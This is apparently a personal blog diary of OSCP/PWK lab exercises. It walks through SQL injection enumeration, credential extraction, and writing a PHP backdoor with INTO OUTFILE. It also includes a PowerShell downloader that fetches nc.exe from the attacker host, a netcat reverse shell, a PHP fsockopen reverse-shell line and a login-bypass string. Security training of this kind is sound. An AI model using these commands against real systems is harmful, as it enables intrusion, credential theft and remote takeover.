Welcome to the dojo-blog!

"If I had 6 hours to chop down a tree, I'd spend the first 4 sharpening the axe!" :Abraham Lincoln

"Never...Never trust the interwebz!!!" -Julius Caesar

Try Harder !

HTB writups of Legacy machines.

Links

7/2/19 : Yet More SQLi...

7/2/19 - Grrrr, lets get this SQLi sewn up!

 Bit frustrating yesterday, playing with this sqli in the search.php page
...its in the lang function, and the query should be dealt with with a 
web-proxy, but since the required TamperData is now pants, I've got to use
Burp instead.
   It is a partially blind sqli, with a bit of an oracle telling you when the
query doesnt match the correct syntax...
I think part of the problem I had yesterday


Oh My Gosh!!! that was a bit of a bind...It seems like we need to limit
output on here, to 1 line of output, or it will not show...
with the necessary command added to the query, i can continue with the
Union All Select enumeration of the db.

@@version
user()
both now work....yipee!
q=foo&lang=en' union all select 1,2,3,4,user(),6 LIMIT 1; <%23 missinghere>

now to add cmd...

q=foo&lang=q=foo&lang=en' union all select 1,2,3,4,"",6
 
into OUTFILE 'c:/xampp/htdocs/backdoor.php'.....

by my server!!!)


http://10.11.15.119/backdoor.php?cmd=dir

...the rest is easy peasy, just like the last exercise...

....Done! Finally!

6/2/19 : More SQLi

6/2/19 - SQLi continued...web application proxies...

13.5.1 - Exercises...

1. Use Tamper Data to cause SQLi on the lang perameter
2. Identify how far you can push this vuln. Can you obtain a full shell?

I started this late last night, and after hitting a few hurdles (see below)
 I decided to start again afresh today...
Tamper Data (at least the new version) will not allow user to edit POST form
 data. Having looked at the forums, and asking on the IRQ #offsec and getting
 no definitive response, Im going to use BurpSuite(freeversion) instead to 
 achieve the same ends. The pedant in me wants Offsec to update their course
 materials...but its actually fitting that I have to get around the problem
 myself....provided that it is actually acceptable to Offsec that I use Burp
 and not a browser-based proxy...I would have used OWASP-mantra but that is
depreciated and no longer available.

5/2/19 : continuing on from late-one last night...

 
# 13.4.2 - Enumerating the Databse...
started doing this last night.....

# 13.4.3 Column Number Enumeration...

first append ?id= to url and add random number
then add ' or " to end of number to get error message, to see
how verbose it will be.

use 'order by' to get the number of columns...eg.
http://10.11.15.119/comment.php?id=738 order by 1

then increase order by number until it breaks...exceeds no. of columns
now we know table has 6 columns, because it breaks at 7.
and we know that the page is using the table 'guestbook'

....

# Union SELECT ALL....

http://10.11.15.119/comment.php?id=738 union all select 1,2,3,4,5,6

( i actually used id=555...but same results...coz its the id of the
 comment dummy!)

my results table is empty because guestbook is empty...lets populate it...

OK, now i realize that in the course-material they used 738 
because thats
the comment number they had...when i populated the table of 
comments i could
see that my comments had ids...i now used id=912....following 
well again!

# 13.4.5 - Extracting Data from the Database.

# to discover the version of mysql in use...
use column 5 for output, coz the field is not just numeric.

http://10.11.15.119/comment.php?id=912 union all select
 1,2,3,4,@@version,6

answer = 5.1.30-community

~~~

# to discover the current user being used for the db connection

http://10.11.15.119/comment.php?id=912 union all select 1,2,3,4,user(),6

answer= root@localhost  !!!

~~~

# enumerate db tables and column structures using 'information schema'

http://10.11.15.119/comment.php?id=912 union all select 1,2,3,4,
table_name,6 FROM information_schema.tables

output = list of table names...BLIMEY!!!

now we can target specific tables...instead of just dumping the whole lot!

'users' and 'user_pwd' look handy !

~~~~

# extract name and password values from the users table

http://10.11.15.119/comment.php?id=912 union select 1,2,3,4,
concat(name,0x3a,password),6 FROM users

0x3a = : ...so username and password are seperated

output = offsec:123456
         secret:password
         backup:backup12

.................shit the bed!!!

# 13.4.5.1 Exercises
1. Enumerate the structure of the db using SQLi...done
2. Understand how and why you can pull data from injected commands
and have it displayed on the screen....i do now...
3. Extract all users and passwords from db....done.

###########################

# 13.4.6 - Leveraging SQL Injection for Code Execution
now we can read/write files to the underlying computer system...
our target is windows...so easier than linux which restricts privs to this
sort of thing...

http://10.11.15.119/comment.php?id=912 union all select 1,2,3,4,load_file 
('c:/windows/system32/drivers/etc/hosts'),6
output = contents of /etc/hosts

~

# next use 'INTO OUTFILE' function to create a malicious PHP file in the 
# server's web root:

http://10.11.15.119/comment.php?id=912 union all select 1,2,3,4,
"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

...shit just got real!

output = we get warning....but it works...
browsing to c:/xampp/htdocs we can see backdoor.php right there!!!

# Exercise
1. Exploit SQL injection along with mysql 'INTO OUTFILE'
 function to obtain
code execution...done
2. Get a shell...

###############

# we can access this backdoor file to execute commands...like ipconfig
10.11.15.119/backdoor.php?cmd=ipconfig



# try dis ...
php -r '$sock=fsockopen("10.11.0.172",12345);exec("cmd");'
fails...probably not structured correctly...but now i can use cmd backdoor
to upload nc.exe as before...

...straight use of wget fails, so use powershell wget again instead,
echoing contents of .ps1 file to folder....

###########
echo $storageDir = $pwd >wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.172/nc.exe" >>wget.ps1
echo $file = "foobar.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file)>>wget.ps1


# then run....
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive
 -NoProfile -File wget.ps1

## then rename foobar.exe to nc.exe (nc.exe is blocked by firewall)
ren foobar.exe nc.exe

# set listner on kali machine
nc -nlvp 12345

# then run...
nc 10.11.0.172 12345 -e cmd
#########

### SUCCESS ####
we have shell !

~~~~~~~~~~~~
~~~~~~~~~~~~
~~~~~~~~~~~~

4/2/19: Now Im a bit more into it Ill continue here,
and fill in the blanks later

yesterday I did an exercise in pwk labs...

13.2.1 Browser Redirection and IFRAME Injection
13.2.2 Stealing Cookies and Session Information
13.2.3...Exercises
my win7 machine has apache server and runs basic webpage with guestbook and admin area.
used xss to steal cookies and gain admin access, bypassing auth.


13.3.1 Local File Inclusion
13.3.1.1 Contaminating Log Files
13.3.1.2 From Lfi to Code Execution
13.3.1.3 ...Exercises

used lfi to inject cmd to apache logs, then read logs as response to cmds inputted 
to url &cmd=
echoed lines of code to powershell script...then executed it to get files served
by my port80....including a renamed (because of firewall block) nc.exe.

renamed nc.exe once inserted, and executed a reverse cmd shell.

....itll be easy they said....

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Today Im going to do...
13.3.2 Remote File Inclusion
....similar to what i did yesterday...
host file on my port80 apache server, and instead of file traversal, 
use the same vulnerable LANG= perameter to point to my file.

...make evil.txt...containing php code...


....cp to /var/www/html/
and execute the above.

...
13.3.2.1 Exercise...
Exploit the RFI vulnerability in the web application and get your shell.

.........will come back to this, as its pretty much the same as yesterday...
and i want to move on to sqli...

#################################

13.4 MySQL SQL Injection...
using win7 mysql server...see how queries are structured....
then abuse....
bypass auth with...
jeff' or 1=1 LIMIT 1;#

# which amounts to ... select * from users where name='jeff' or 1=1 LIMIT 1;#
# no need to go further as the hash # makes server ignore everything else...
# like the null byte %00 for urls.

~~~~~~~~~
13.4.1.1 ...Exercises

1. Interact with the MySQL db and manually execute the commands as the web
server does as par of the authentication process. Understand the vulnerability.
2. Utilize SQL injection to bypass the login process.
3. Understand why the username is  reported like it is once the authentication
process is bypassed.
~~~~~~~~~done...

13.4.2 Enumerating the database...

16/1/19: 4 days to go before start of PWK-yay!

Spent the morning in my nicely cleared (almost) office, with my
 linux mint pc to update/upgrade;
                                 its been idle for many months.
    At the same time I had a Lenovo C-series to upgrade the ram on, and 
cleanup for one client;
        and also sort out a dirty acer laptop...very dirty for another.
    My 2pm tutorial client called to reschedule for next week, so that's given me some time
         to start this....pick up kids at 3pm!!!

        Progress report on Hacker101-CTF....I'm currently on 'cody's blog',
         got the 'gallery' on half too.
        Ive had 3 private invitations, turned them all down so far, but I think
 I'll accept the next one
         - providing it's not immoral!
        I'll start looking at live public projects in the near future, just want 
to gague how much time
         this oscp course is going to take up.

...to be continued.

Links